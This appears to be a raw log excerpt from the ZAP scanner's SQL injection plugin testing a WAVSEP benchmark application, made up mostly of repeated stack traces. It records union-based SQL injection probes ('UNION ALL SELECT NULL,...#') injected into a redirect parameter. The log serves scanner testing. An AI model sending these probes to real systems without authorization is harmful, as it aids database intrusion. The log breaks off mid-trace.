org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682384 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682385 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682386 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682386 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682388 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682388 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682389 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682389 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682390 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9682391 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682391 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682392 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682393 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682394 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at 